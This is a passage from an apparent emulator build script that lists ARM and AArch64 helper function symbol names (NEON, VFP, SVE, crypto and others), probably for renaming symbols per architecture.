helper_neon_hadd_s32 \ helper_neon_hadd_u32 \ helper_neon_rhadd_s8 \ helper_neon_rhadd_u8 \ helper_neon_rhadd_s16 \ helper_neon_rhadd_u16 \ helper_neon_rhadd_s32 \ helper_neon_rhadd_u32 \ helper_neon_hsub_s8 \ helper_neon_hsub_u8 \ helper_neon_hsub_s16 \ helper_neon_hsub_u16 \ helper_neon_hsub_s32 \ helper_neon_hsub_u32 \ helper_neon_cgt_s8 \ helper_neon_cgt_u8 \ helper_neon_cgt_s16 \ helper_neon_cgt_u16 \ helper_neon_cgt_s32 \ helper_neon_cgt_u32 \ helper_neon_cge_s8 \ helper_neon_cge_u8 \ helper_neon_cge_s16 \ helper_neon_cge_u16 \ helper_neon_cge_s32 \ helper_neon_cge_u32 \ helper_neon_pmin_s8 \ helper_neon_pmin_u8 \ helper_neon_pmin_s16 \ helper_neon_pmin_u16 \ helper_neon_pmax_s8 \ helper_neon_pmax_u8 \ helper_neon_pmax_s16 \ helper_neon_pmax_u16 \ helper_neon_abd_s8 \ helper_neon_abd_u8 \ helper_neon_abd_s16 \ helper_neon_abd_u16 \ helper_neon_abd_s32 \ helper_neon_abd_u32 \ helper_neon_shl_u16 \ helper_neon_shl_s16 \ helper_neon_rshl_s8 \ helper_neon_rshl_s16 \ helper_neon_rshl_s32 \ helper_neon_rshl_s64 \ helper_neon_rshl_u8 \ helper_neon_rshl_u16 \ helper_neon_rshl_u32 \ helper_neon_rshl_u64 \ helper_neon_qshl_u8 \ helper_neon_qshl_u16 \ helper_neon_qshl_u32 \ helper_neon_qshl_u64 \ helper_neon_qshl_s8 \ helper_neon_qshl_s16 \ helper_neon_qshl_s32 \ helper_neon_qshl_s64 \ helper_neon_qshlu_s8 \ helper_neon_qshlu_s16 \ helper_neon_qshlu_s32 \ helper_neon_qshlu_s64 \ helper_neon_qrshl_u8 \ helper_neon_qrshl_u16 \ helper_neon_qrshl_u32 \ helper_neon_qrshl_u64 \ helper_neon_qrshl_s8 \ helper_neon_qrshl_s16 \ helper_neon_qrshl_s32 \ helper_neon_qrshl_s64 \ 
helper_neon_add_u8 \ helper_neon_add_u16 \ helper_neon_padd_u8 \ helper_neon_padd_u16 \ helper_neon_sub_u8 \ helper_neon_sub_u16 \ helper_neon_mul_u8 \ helper_neon_mul_u16 \ helper_neon_tst_u8 \ helper_neon_tst_u16 \ helper_neon_tst_u32 \ helper_neon_ceq_u8 \ helper_neon_ceq_u16 \ helper_neon_ceq_u32 \ helper_neon_clz_u8 \ helper_neon_clz_u16 \ helper_neon_cls_s8 \ helper_neon_cls_s16 \ helper_neon_cls_s32 \ helper_neon_cnt_u8 \ helper_neon_rbit_u8 \ helper_neon_qdmulh_s16 \ helper_neon_qrdmulh_s16 \ helper_neon_qdmulh_s32 \ helper_neon_qrdmulh_s32 \ helper_neon_narrow_u8 \ helper_neon_narrow_u16 \ helper_neon_narrow_high_u8 \ helper_neon_narrow_high_u16 \ helper_neon_narrow_round_high_u8 \ helper_neon_narrow_round_high_u16 \ helper_neon_unarrow_sat8 \ helper_neon_narrow_sat_u8 \ helper_neon_narrow_sat_s8 \ helper_neon_unarrow_sat16 \ helper_neon_narrow_sat_u16 \ helper_neon_narrow_sat_s16 \ helper_neon_unarrow_sat32 \ helper_neon_narrow_sat_u32 \ helper_neon_narrow_sat_s32 \ helper_neon_widen_u8 \ helper_neon_widen_s8 \ helper_neon_widen_u16 \ helper_neon_widen_s16 \ helper_neon_addl_u16 \ helper_neon_addl_u32 \ helper_neon_paddl_u16 \ helper_neon_paddl_u32 \ helper_neon_subl_u16 \ helper_neon_subl_u32 \ helper_neon_addl_saturate_s32 \ helper_neon_addl_saturate_s64 \ helper_neon_abdl_u16 \ helper_neon_abdl_s16 \ helper_neon_abdl_u32 \ helper_neon_abdl_s32 \ helper_neon_abdl_u64 \ helper_neon_abdl_s64 \ helper_neon_mull_u8 \ helper_neon_mull_s8 \ helper_neon_mull_u16 \ helper_neon_mull_s16 \ helper_neon_negl_u16 \ helper_neon_negl_u32 \ helper_neon_qabs_s8 \ helper_neon_qneg_s8 \ helper_neon_qabs_s16 \ helper_neon_qneg_s16 \ helper_neon_qabs_s32 \ helper_neon_qneg_s32 \ helper_neon_qabs_s64 \ helper_neon_qneg_s64 \ helper_neon_abd_f32 \ helper_neon_ceq_f32 \ helper_neon_cge_f32 \ helper_neon_cgt_f32 \ helper_neon_acge_f32 \ helper_neon_acgt_f32 \ helper_neon_acge_f64 \ helper_neon_acgt_f64 \ helper_neon_qunzip8 \ helper_neon_qunzip16 \ helper_neon_qunzip32 \ helper_neon_unzip8 \ helper_neon_unzip16 \ helper_neon_qzip8 \ helper_neon_qzip16 \ helper_neon_qzip32 \ helper_neon_zip8 \ helper_neon_zip16 \ raise_exception \ raise_exception_ra \ helper_neon_tbl \ helper_v8m_stackcheck \ helper_add_setq \ helper_add_saturate \ helper_sub_saturate \ helper_add_usaturate \ helper_sub_usaturate \ helper_ssat \ helper_ssat16 \ helper_usat \ helper_usat16 \ helper_setend \ helper_wfi \ helper_wfe \ helper_yield \ helper_exception_internal \ helper_exception_with_syndrome \ helper_exception_bkpt_insn \ helper_cpsr_read \ helper_cpsr_write \ helper_cpsr_write_eret \ helper_get_user_reg \ helper_set_user_reg \ helper_set_r13_banked \ helper_get_r13_banked \ helper_msr_banked \ helper_mrs_banked \ helper_access_check_cp_reg \ helper_set_cp_reg \ helper_get_cp_reg \ helper_set_cp_reg64 \ helper_get_cp_reg64 \ helper_pre_hvc \ helper_pre_smc \ helper_shl_cc \ helper_shr_cc \ helper_sar_cc \ helper_ror_cc \ arm_is_psci_call \ arm_handle_psci_call \ arm_cpu_do_unaligned_access \ arm_cpu_do_transaction_failed \ arm_cpu_tlb_fill \ arm_translate_init \ arm_test_cc \ arm_free_cc \ arm_jump_cc \ arm_gen_test_cc \ vfp_expand_imm \ gen_cmtst_i64 \ gen_ushl_i32 \ gen_ushl_i64 \ gen_sshl_i32 \ gen_sshl_i64 \ gen_intermediate_code \ restore_state_to_opc \ helper_neon_qrdmlah_s16 \ helper_gvec_qrdmlah_s16 \ helper_neon_qrdmlsh_s16 \ helper_gvec_qrdmlsh_s16 \ helper_neon_qrdmlah_s32 \ helper_gvec_qrdmlah_s32 \ helper_neon_qrdmlsh_s32 \ helper_gvec_qrdmlsh_s32 \ helper_gvec_sdot_b \ helper_gvec_udot_b \ helper_gvec_sdot_h \ 
helper_gvec_udot_h \ helper_gvec_sdot_idx_b \ helper_gvec_udot_idx_b \ helper_gvec_sdot_idx_h \ helper_gvec_udot_idx_h \ helper_gvec_fcaddh \ helper_gvec_fcadds \ helper_gvec_fcaddd \ helper_gvec_fcmlah \ helper_gvec_fcmlah_idx \ helper_gvec_fcmlas \ helper_gvec_fcmlas_idx \ helper_gvec_fcmlad \ helper_gvec_frecpe_h \ helper_gvec_frecpe_s \ helper_gvec_frecpe_d \ helper_gvec_frsqrte_h \ helper_gvec_frsqrte_s \ helper_gvec_frsqrte_d \ helper_gvec_fadd_h \ helper_gvec_fadd_s \ helper_gvec_fadd_d \ helper_gvec_fsub_h \ helper_gvec_fsub_s \ helper_gvec_fsub_d \ helper_gvec_fmul_h \ helper_gvec_fmul_s \ helper_gvec_fmul_d \ helper_gvec_ftsmul_h \ helper_gvec_ftsmul_s \ helper_gvec_ftsmul_d \ helper_gvec_fmul_idx_h \ helper_gvec_fmul_idx_s \ helper_gvec_fmul_idx_d \ helper_gvec_fmla_idx_h \ helper_gvec_fmla_idx_s \ helper_gvec_fmla_idx_d \ helper_gvec_uqadd_b \ helper_gvec_uqadd_h \ helper_gvec_uqadd_s \ helper_gvec_sqadd_b \ helper_gvec_sqadd_h \ helper_gvec_sqadd_s \ helper_gvec_uqsub_b \ helper_gvec_uqsub_h \ helper_gvec_uqsub_s \ helper_gvec_sqsub_b \ helper_gvec_sqsub_h \ helper_gvec_sqsub_s \ helper_gvec_uqadd_d \ helper_gvec_uqsub_d \ helper_gvec_sqadd_d \ helper_gvec_sqsub_d \ helper_gvec_fmlal_a32 \ helper_gvec_fmlal_a64 \ helper_gvec_fmlal_idx_a32 \ helper_gvec_fmlal_idx_a64 \ helper_gvec_sshl_b \ helper_gvec_sshl_h \ helper_gvec_ushl_b \ helper_gvec_ushl_h \ helper_gvec_pmul_b \ helper_gvec_pmull_q \ helper_neon_pmull_h \ helper_vfp_get_fpscr \ vfp_get_fpscr \ helper_vfp_set_fpscr \ vfp_set_fpscr \ helper_vfp_adds \ helper_vfp_addd \ helper_vfp_subs \ helper_vfp_subd \ helper_vfp_muls \ helper_vfp_muld \ helper_vfp_divs \ helper_vfp_divd \ helper_vfp_mins \ helper_vfp_mind \ helper_vfp_maxs \ helper_vfp_maxd \ helper_vfp_minnums \ helper_vfp_minnumd \ helper_vfp_maxnums \ helper_vfp_maxnumd \ helper_vfp_negs \ helper_vfp_negd \ helper_vfp_abss \ helper_vfp_absd \ helper_vfp_sqrts \ helper_vfp_sqrtd \ helper_vfp_cmps \ helper_vfp_cmpes \ helper_vfp_cmpd \ helper_vfp_cmped \ helper_vfp_sitoh \ helper_vfp_tosih \ helper_vfp_tosizh \ helper_vfp_sitos \ helper_vfp_tosis \ helper_vfp_tosizs \ helper_vfp_sitod \ helper_vfp_tosid \ helper_vfp_tosizd \ helper_vfp_uitoh \ helper_vfp_touih \ helper_vfp_touizh \ helper_vfp_uitos \ helper_vfp_touis \ helper_vfp_touizs \ helper_vfp_uitod \ helper_vfp_touid \ helper_vfp_touizd \ helper_vfp_fcvtds \ helper_vfp_fcvtsd \ helper_vfp_shtod \ helper_vfp_toshd_round_to_zero \ helper_vfp_toshd \ helper_vfp_sltod \ helper_vfp_tosld_round_to_zero \ helper_vfp_tosld \ helper_vfp_sqtod \ helper_vfp_tosqd \ helper_vfp_uhtod \ helper_vfp_touhd_round_to_zero \ helper_vfp_touhd \ helper_vfp_ultod \ helper_vfp_tould_round_to_zero \ helper_vfp_tould \ helper_vfp_uqtod \ helper_vfp_touqd \ helper_vfp_shtos \ helper_vfp_toshs_round_to_zero \ helper_vfp_toshs \ helper_vfp_sltos \ helper_vfp_tosls_round_to_zero \ helper_vfp_tosls \ helper_vfp_sqtos \ helper_vfp_tosqs \ helper_vfp_uhtos \ helper_vfp_touhs_round_to_zero \ helper_vfp_touhs \ helper_vfp_ultos \ helper_vfp_touls_round_to_zero \ helper_vfp_touls \ helper_vfp_uqtos \ helper_vfp_touqs \ helper_vfp_sltoh \ helper_vfp_ultoh \ helper_vfp_sqtoh \ helper_vfp_uqtoh \ helper_vfp_toshh \ helper_vfp_touhh \ helper_vfp_toslh \ helper_vfp_toulh \ helper_vfp_tosqh \ helper_vfp_touqh \ helper_set_rmode \ helper_set_neon_rmode \ helper_vfp_fcvt_f16_to_f32 \ helper_vfp_fcvt_f32_to_f16 \ helper_vfp_fcvt_f16_to_f64 \ helper_vfp_fcvt_f64_to_f16 \ helper_recps_f32 \ helper_rsqrts_f32 \ helper_recpe_f16 \ helper_recpe_f32 \ 
helper_recpe_f64 \ helper_rsqrte_f16 \ helper_rsqrte_f32 \ helper_rsqrte_f64 \ helper_recpe_u32 \ helper_rsqrte_u32 \ helper_vfp_muladds \ helper_vfp_muladdd \ helper_rints_exact \ helper_rintd_exact \ helper_rints \ helper_rintd \ arm_rmode_to_sf \ helper_fjcvtzs \ helper_vjcvt \ helper_frint32_s \ helper_frint64_s \ helper_frint32_d \ helper_frint64_d \ helper_check_hcr_el2_trap \ mla_op \ mls_op \ sshl_op \ ushl_op \ uqsub_op \ sqsub_op \ uqadd_op \ sqadd_op \ sli_op \ cmtst_op \ sri_op \ usra_op \ ssra_op \ " aarch64_SYMBOLS=" cpu_aarch64_init \ arm_cpu_exec_interrupt \ arm_cpu_update_virq \ arm_cpu_update_vfiq \ arm_cpu_initfn \ gt_cntfrq_period_ns \ arm_cpu_post_init \ arm_cpu_realizefn \ arm_cpu_class_init \ cpu_arm_init \ helper_crypto_aese \ helper_crypto_aesmc \ helper_crypto_sha1_3reg \ helper_crypto_sha1h \ helper_crypto_sha1su1 \ helper_crypto_sha256h \ helper_crypto_sha256h2 \ helper_crypto_sha256su0 \ helper_crypto_sha256su1 \ helper_crypto_sha512h \ helper_crypto_sha512h2 \ helper_crypto_sha512su0 \ helper_crypto_sha512su1 \ helper_crypto_sm3partw1 \ helper_crypto_sm3partw2 \ helper_crypto_sm3tt \ helper_crypto_sm4e \ helper_crypto_sm4ekey \ helper_check_breakpoints \ arm_debug_check_watchpoint \ arm_debug_excp_handler \ arm_adjust_watchpoint_address \ helper_udiv64 \ helper_sdiv64 \ helper_rbit64 \ helper_msr_i_spsel \ helper_msr_i_daifset \ helper_msr_i_daifclear \ helper_vfp_cmph_a64 \ helper_vfp_cmpeh_a64 \ helper_vfp_cmps_a64 \ helper_vfp_cmpes_a64 \ helper_vfp_cmpd_a64 \ helper_vfp_cmped_a64 \ helper_vfp_mulxs \ helper_vfp_mulxd \ helper_simd_tbl \ helper_neon_ceq_f64 \ helper_neon_cge_f64 \ helper_neon_cgt_f64 \ helper_recpsf_f16 \ helper_recpsf_f32 \ helper_recpsf_f64 \ helper_rsqrtsf_f16 \ helper_rsqrtsf_f32 \ helper_rsqrtsf_f64 \ helper_neon_addlp_s8 \ helper_neon_addlp_u8 \ helper_neon_addlp_s16 \ helper_neon_addlp_u16 \ helper_frecpx_f16 \ helper_frecpx_f32 \ helper_frecpx_f64 \ helper_fcvtx_f64_to_f32 \ helper_crc32_64 \ helper_crc32c_64 \ helper_paired_cmpxchg64_le \ helper_paired_cmpxchg64_le_parallel \ helper_paired_cmpxchg64_be \ helper_paired_cmpxchg64_be_parallel \ helper_casp_le_parallel \ helper_casp_be_parallel \ helper_advsimd_addh \ helper_advsimd_subh \ helper_advsimd_mulh \ helper_advsimd_divh \ helper_advsimd_minh \ helper_advsimd_maxh \ helper_advsimd_minnumh \ helper_advsimd_maxnumh \ helper_advsimd_add2h \ helper_advsimd_sub2h \ helper_advsimd_mul2h \ helper_advsimd_div2h \ helper_advsimd_min2h \ helper_advsimd_max2h \ helper_advsimd_minnum2h \ helper_advsimd_maxnum2h \ helper_advsimd_mulxh \ helper_advsimd_mulx2h \ helper_advsimd_muladdh \ helper_advsimd_muladd2h \ helper_advsimd_ceq_f16 \ helper_advsimd_cge_f16 \ helper_advsimd_cgt_f16 \ helper_advsimd_acge_f16 \ helper_advsimd_acgt_f16 \ helper_advsimd_rinth_exact \ helper_advsimd_rinth \ helper_advsimd_f16tosinth \ helper_advsimd_f16touinth \ helper_exception_return \ helper_sqrt_f16 \ helper_dc_zva \ read_raw_cp_reg \ pmu_init \ pmu_op_start \ pmu_op_finish \ pmu_pre_el_change \ pmu_post_el_change \ arm_pmu_timer_cb \ arm_gt_ptimer_cb \ arm_gt_vtimer_cb \ arm_gt_htimer_cb \ arm_gt_stimer_cb \ arm_gt_hvtimer_cb \ arm_hcr_el2_eff \ sve_exception_el \ sve_zcr_len_for_el \ hw_watchpoint_update \ hw_watchpoint_update_all \ hw_breakpoint_update \ hw_breakpoint_update_all \ register_cp_regs_for_features \ define_one_arm_cp_reg_with_opaque \ define_arm_cp_regs_with_opaque \ modify_arm_cp_regs \ get_arm_cp_reginfo \ arm_cp_write_ignore \ arm_cp_read_zero \ arm_cp_reset_ignore \ cpsr_read \ 
cpsr_write \ helper_sxtb16 \ helper_uxtb16 \ helper_sdiv \ helper_udiv \ helper_rbit \ arm_phys_excp_target_el \ aarch64_sync_32_to_64 \ aarch64_sync_64_to_32 \ arm_cpu_do_interrupt \ arm_sctlr \ arm_s1_regime_using_lpae_format \ aa64_va_parameters \ v8m_security_lookup \ pmsav8_mpu_lookup \ get_phys_addr \ arm_cpu_get_phys_page_attrs_debug \ helper_qadd16 \ helper_qadd8 \ helper_qsub16 \ helper_qsub8 \ helper_qsubaddx \ helper_qaddsubx \ helper_uqadd16 \ helper_uqadd8 \ helper_uqsub16 \ helper_uqsub8 \ helper_uqsubaddx \ helper_uqaddsubx \ helper_sadd16 \ helper_sadd8 \ helper_ssub16 \ helper_ssub8 \ helper_ssubaddx \ helper_saddsubx \ helper_uadd16 \ helper_uadd8 \ helper_usub16 \ helper_usub8 \ helper_usubaddx \ helper_uaddsubx \ helper_shadd16 \ helper_shadd8 \ helper_shsub16 \ helper_shsub8 \ helper_shsubaddx \ helper_shaddsubx \ helper_uhadd16 \ helper_uhadd8 \ helper_uhsub16 \ helper_uhsub8 \ helper_uhsubaddx \ helper_uhaddsubx \ helper_usad8 \ helper_sel_flags \ helper_crc32 \ helper_crc32c \ fp_exception_el \ arm_mmu_idx_to_el \ arm_mmu_idx_el \ arm_mmu_idx \ arm_stage1_mmu_idx \ arm_rebuild_hflags \ helper_rebuild_hflags_m32_newel \ helper_rebuild_hflags_m32 \ helper_rebuild_hflags_a32_newel \ helper_rebuild_hflags_a32 \ helper_rebuild_hflags_a64 \ cpu_get_tb_cpu_state \ aarch64_sve_narrow_vq \ aarch64_sve_change_el \ helper_iwmmxt_maddsq \ helper_iwmmxt_madduq \ helper_iwmmxt_sadb \ helper_iwmmxt_sadw \ helper_iwmmxt_mulslw \ helper_iwmmxt_mulshw \ helper_iwmmxt_mululw \ helper_iwmmxt_muluhw \ helper_iwmmxt_macsw \ helper_iwmmxt_macuw \ helper_iwmmxt_unpacklb \ helper_iwmmxt_unpacklw \ helper_iwmmxt_unpackll \ helper_iwmmxt_unpacklub \ helper_iwmmxt_unpackluw \ helper_iwmmxt_unpacklul \ helper_iwmmxt_unpacklsb \ helper_iwmmxt_unpacklsw \ helper_iwmmxt_unpacklsl \ helper_iwmmxt_unpackhb \ helper_iwmmxt_unpackhw \ helper_iwmmxt_unpackhl \ helper_iwmmxt_unpackhub \ helper_iwmmxt_unpackhuw \ helper_iwmmxt_unpackhul \ helper_iwmmxt_unpackhsb \ helper_iwmmxt_unpackhsw \ helper_iwmmxt_unpackhsl \ helper_iwmmxt_cmpeqb \ helper_iwmmxt_cmpeqw \ helper_iwmmxt_cmpeql \ helper_iwmmxt_cmpgtsb \ helper_iwmmxt_cmpgtsw \ helper_iwmmxt_cmpgtsl \ helper_iwmmxt_cmpgtub \ helper_iwmmxt_cmpgtuw \ helper_iwmmxt_cmpgtul \ helper_iwmmxt_minsb \ helper_iwmmxt_minsw \ helper_iwmmxt_minsl \ helper_iwmmxt_minub \ helper_iwmmxt_minuw \ helper_iwmmxt_minul \ helper_iwmmxt_maxsb \ helper_iwmmxt_maxsw \ helper_iwmmxt_maxsl \ helper_iwmmxt_maxub \ helper_iwmmxt_maxuw \ helper_iwmmxt_maxul \ helper_iwmmxt_subnb \ helper_iwmmxt_subnw \ helper_iwmmxt_subnl \ helper_iwmmxt_addnb \ helper_iwmmxt_addnw \ helper_iwmmxt_addnl \ helper_iwmmxt_subub \ helper_iwmmxt_subuw \ helper_iwmmxt_subul \ helper_iwmmxt_addub \ helper_iwmmxt_adduw \ helper_iwmmxt_addul \ helper_iwmmxt_subsb \ helper_iwmmxt_subsw \ helper_iwmmxt_subsl \ helper_iwmmxt_addsb \ helper_iwmmxt_addsw \ helper_iwmmxt_addsl \ helper_iwmmxt_avgb0 \ helper_iwmmxt_avgb1 \ helper_iwmmxt_avgw0 \ helper_iwmmxt_avgw1 \ helper_iwmmxt_align \ helper_iwmmxt_insr \ helper_iwmmxt_setpsr_nz \ helper_iwmmxt_bcstb \ helper_iwmmxt_bcstw \ helper_iwmmxt_bcstl \ helper_iwmmxt_addcb \ helper_iwmmxt_addcw \ helper_iwmmxt_addcl \ helper_iwmmxt_msbb \ helper_iwmmxt_msbw \ helper_iwmmxt_msbl \ helper_iwmmxt_srlw \ helper_iwmmxt_srll \ helper_iwmmxt_srlq \ helper_iwmmxt_sllw \ helper_iwmmxt_slll \ helper_iwmmxt_sllq \ helper_iwmmxt_sraw \ helper_iwmmxt_sral \ helper_iwmmxt_sraq \ helper_iwmmxt_rorw \ helper_iwmmxt_rorl \ helper_iwmmxt_rorq \ helper_iwmmxt_shufh \ 
helper_iwmmxt_packuw \ helper_iwmmxt_packul \ helper_iwmmxt_packuq \ helper_iwmmxt_packsw \ helper_iwmmxt_packsl \ helper_iwmmxt_packsq \ helper_iwmmxt_muladdsl \ helper_iwmmxt_muladdsw \ helper_iwmmxt_muladdswl \ armv7m_nvic_set_pending \ helper_v7m_preserve_fp_state \ write_v7m_exception \ helper_v7m_bxns \ helper_v7m_blxns \ armv7m_nvic_neg_prio_requested \ helper_v7m_vlstm \ helper_v7m_vlldm \ arm_v7m_cpu_do_interrupt \ helper_v7m_mrs \ helper_v7m_msr \ helper_v7m_tt \ arm_v7m_mmu_idx_all \ arm_v7m_mmu_idx_for_secstate_and_priv \ arm_v7m_mmu_idx_for_secstate \ helper_neon_qadd_u8 \ helper_neon_qadd_u16 \ helper_neon_qadd_u32 \ helper_neon_qadd_u64 \ helper_neon_qadd_s8 \ helper_neon_qadd_s16 \ helper_neon_qadd_s32 \ helper_neon_qadd_s64 \ helper_neon_uqadd_s8 \ helper_neon_uqadd_s16 \ helper_neon_uqadd_s32 \ helper_neon_uqadd_s64 \ helper_neon_sqadd_u8 \ helper_neon_sqadd_u16 \ helper_neon_sqadd_u32 \ helper_neon_sqadd_u64 \ helper_neon_qsub_u8 \ helper_neon_qsub_u16 \ helper_neon_qsub_u32 \ helper_neon_qsub_u64 \ helper_neon_qsub_s8 \ helper_neon_qsub_s16 \ helper_neon_qsub_s32 \ helper_neon_qsub_s64 \ helper_neon_hadd_s8 \ helper_neon_hadd_u8 \ helper_neon_hadd_s16 \ helper_neon_hadd_u16 \ helper_neon_hadd_s32 \ helper_neon_hadd_u32 \ helper_neon_rhadd_s8 \ helper_neon_rhadd_u8 \ helper_neon_rhadd_s16 \ helper_neon_rhadd_u16 \ helper_neon_rhadd_s32 \ helper_neon_rhadd_u32 \ helper_neon_hsub_s8 \ helper_neon_hsub_u8 \ helper_neon_hsub_s16 \ helper_neon_hsub_u16 \ helper_neon_hsub_s32 \ helper_neon_hsub_u32 \ helper_neon_cgt_s8 \ helper_neon_cgt_u8 \ helper_neon_cgt_s16 \ helper_neon_cgt_u16 \ helper_neon_cgt_s32 \ helper_neon_cgt_u32 \ helper_neon_cge_s8 \ helper_neon_cge_u8 \ helper_neon_cge_s16 \ helper_neon_cge_u16 \ helper_neon_cge_s32 \ helper_neon_cge_u32 \ helper_neon_pmin_s8 \ helper_neon_pmin_u8 \ helper_neon_pmin_s16 \ helper_neon_pmin_u16 \ helper_neon_pmax_s8 \ helper_neon_pmax_u8 \ helper_neon_pmax_s16 \ helper_neon_pmax_u16 \ helper_neon_abd_s8 \ helper_neon_abd_u8 \ helper_neon_abd_s16 \ helper_neon_abd_u16 \ helper_neon_abd_s32 \ helper_neon_abd_u32 \ helper_neon_shl_u16 \ helper_neon_shl_s16 \ helper_neon_rshl_s8 \ helper_neon_rshl_s16 \ helper_neon_rshl_s32 \ helper_neon_rshl_s64 \ helper_neon_rshl_u8 \ helper_neon_rshl_u16 \ helper_neon_rshl_u32 \ helper_neon_rshl_u64 \ helper_neon_qshl_u8 \ helper_neon_qshl_u16 \ helper_neon_qshl_u32 \ helper_neon_qshl_u64 \ helper_neon_qshl_s8 \ helper_neon_qshl_s16 \ helper_neon_qshl_s32 \ helper_neon_qshl_s64 \ helper_neon_qshlu_s8 \ helper_neon_qshlu_s16 \ helper_neon_qshlu_s32 \ helper_neon_qshlu_s64 \ helper_neon_qrshl_u8 \ helper_neon_qrshl_u16 \ helper_neon_qrshl_u32 \ helper_neon_qrshl_u64 \ helper_neon_qrshl_s8 \ helper_neon_qrshl_s16 \ helper_neon_qrshl_s32 \ helper_neon_qrshl_s64 \ helper_neon_add_u8 \ helper_neon_add_u16 \ helper_neon_padd_u8 \ helper_neon_padd_u16 \ helper_neon_sub_u8 \ helper_neon_sub_u16 \ helper_neon_mul_u8 \ helper_neon_mul_u16 \ helper_neon_tst_u8 \ helper_neon_tst_u16 \ helper_neon_tst_u32 \ helper_neon_ceq_u8 \ helper_neon_ceq_u16 \ helper_neon_ceq_u32 \ helper_neon_clz_u8 \ helper_neon_clz_u16 \ helper_neon_cls_s8 \ helper_neon_cls_s16 \ helper_neon_cls_s32 \ helper_neon_cnt_u8 \ helper_neon_rbit_u8 \ helper_neon_qdmulh_s16 \ helper_neon_qrdmulh_s16 \ helper_neon_qdmulh_s32 \ helper_neon_qrdmulh_s32 \ helper_neon_narrow_u8 \ helper_neon_narrow_u16 \ helper_neon_narrow_high_u8 \ helper_neon_narrow_high_u16 \ helper_neon_narrow_round_high_u8 \ helper_neon_narrow_round_high_u16 \ 
helper_neon_unarrow_sat8 \ helper_neon_narrow_sat_u8 \ helper_neon_narrow_sat_s8 \ helper_neon_unarrow_sat16 \ helper_neon_narrow_sat_u16 \ helper_neon_narrow_sat_s16 \ helper_neon_unarrow_sat32 \ helper_neon_narrow_sat_u32 \ helper_neon_narrow_sat_s32 \ helper_neon_widen_u8 \ helper_neon_widen_s8 \ helper_neon_widen_u16 \ helper_neon_widen_s16 \ helper_neon_addl_u16 \ helper_neon_addl_u32 \ helper_neon_paddl_u16 \ helper_neon_paddl_u32 \ helper_neon_subl_u16 \ helper_neon_subl_u32 \ helper_neon_addl_saturate_s32 \ helper_neon_addl_saturate_s64 \ helper_neon_abdl_u16 \ helper_neon_abdl_s16 \ helper_neon_abdl_u32 \ helper_neon_abdl_s32 \ helper_neon_abdl_u64 \ helper_neon_abdl_s64 \ helper_neon_mull_u8 \ helper_neon_mull_s8 \ helper_neon_mull_u16 \ helper_neon_mull_s16 \ helper_neon_negl_u16 \ helper_neon_negl_u32 \ helper_neon_qabs_s8 \ helper_neon_qneg_s8 \ helper_neon_qabs_s16 \ helper_neon_qneg_s16 \ helper_neon_qabs_s32 \ helper_neon_qneg_s32 \ helper_neon_qabs_s64 \ helper_neon_qneg_s64 \ helper_neon_abd_f32 \ helper_neon_ceq_f32 \ helper_neon_cge_f32 \ helper_neon_cgt_f32 \ helper_neon_acge_f32 \ helper_neon_acgt_f32 \ helper_neon_acge_f64 \ helper_neon_acgt_f64 \ helper_neon_qunzip8 \ helper_neon_qunzip16 \ helper_neon_qunzip32 \ helper_neon_unzip8 \ helper_neon_unzip16 \ helper_neon_qzip8 \ helper_neon_qzip16 \ helper_neon_qzip32 \ helper_neon_zip8 \ helper_neon_zip16 \ raise_exception \ raise_exception_ra \ helper_neon_tbl \ helper_v8m_stackcheck \ helper_add_setq \ helper_add_saturate \ helper_sub_saturate \ helper_add_usaturate \ helper_sub_usaturate \ helper_ssat \ helper_ssat16 \ helper_usat \ helper_usat16 \ helper_setend \ helper_wfi \ helper_wfe \ helper_yield \ helper_exception_internal \ helper_exception_with_syndrome \ helper_exception_bkpt_insn \ helper_cpsr_read \ helper_cpsr_write \ helper_cpsr_write_eret \ helper_get_user_reg \ helper_set_user_reg \ helper_set_r13_banked \ helper_get_r13_banked \ helper_msr_banked \ helper_mrs_banked \ helper_access_check_cp_reg \ helper_set_cp_reg \ helper_get_cp_reg \ helper_set_cp_reg64 \ helper_get_cp_reg64 \ helper_pre_hvc \ helper_pre_smc \ helper_shl_cc \ helper_shr_cc \ helper_sar_cc \ helper_ror_cc \ helper_pacia \ helper_pacib \ helper_pacda \ helper_pacdb \ helper_pacga \ helper_autia \ helper_autib \ helper_autda \ helper_autdb \ helper_xpaci \ helper_xpacd \ arm_is_psci_call \ arm_handle_psci_call \ helper_sve_predtest1 \ helper_sve_predtest \ helper_sve_and_pppp \ helper_sve_bic_pppp \ helper_sve_eor_pppp \ helper_sve_sel_pppp \ helper_sve_orr_pppp \ helper_sve_orn_pppp \ helper_sve_nor_pppp \ helper_sve_nand_pppp \ helper_sve_and_zpzz_b \ helper_sve_and_zpzz_h \ helper_sve_and_zpzz_s \ helper_sve_and_zpzz_d \ helper_sve_orr_zpzz_b \ helper_sve_orr_zpzz_h \ helper_sve_orr_zpzz_s \ helper_sve_orr_zpzz_d \ helper_sve_eor_zpzz_b \ helper_sve_eor_zpzz_h \ helper_sve_eor_zpzz_s \ helper_sve_eor_zpzz_d \ helper_sve_bic_zpzz_b \ helper_sve_bic_zpzz_h \ helper_sve_bic_zpzz_s \ helper_sve_bic_zpzz_d \ helper_sve_add_zpzz_b \ helper_sve_add_zpzz_h \ helper_sve_add_zpzz_s \ helper_sve_add_zpzz_d \ helper_sve_sub_zpzz_b \ helper_sve_sub_zpzz_h \ helper_sve_sub_zpzz_s \ helper_sve_sub_zpzz_d \ helper_sve_smax_zpzz_b \ helper_sve_smax_zpzz_h \ helper_sve_smax_zpzz_s \ helper_sve_smax_zpzz_d \ helper_sve_umax_zpzz_b \ helper_sve_umax_zpzz_h \ helper_sve_umax_zpzz_s \ helper_sve_umax_zpzz_d \ helper_sve_smin_zpzz_b \ helper_sve_smin_zpzz_h \ helper_sve_smin_zpzz_s \ helper_sve_smin_zpzz_d \ helper_sve_umin_zpzz_b \ 
